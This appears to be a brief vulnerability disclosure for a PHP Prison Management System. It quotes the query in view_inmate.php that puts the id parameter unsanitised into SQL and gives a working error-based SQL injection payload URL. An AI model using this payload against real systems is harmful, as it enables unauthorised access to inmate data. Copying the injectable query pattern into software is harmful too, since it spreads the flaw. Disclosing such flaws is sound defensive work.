Vendor Homepage : https://www.sourcecodester.com/
Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id']
in /pms/admin/inmates/view_inmate.php:3
$qry = $conn->query("SELECT *,concat(lastname,', ', firstname, coalesce(concat(' ', middlename), '')) as `name` from `inmate_list` where id = '{$_GET['id']}' ");
- Payload :
# Error Based
http://localhost/pms/admin/?page=inmates/view_inmate&id=1'-if(database()='pms_db',0,1)%23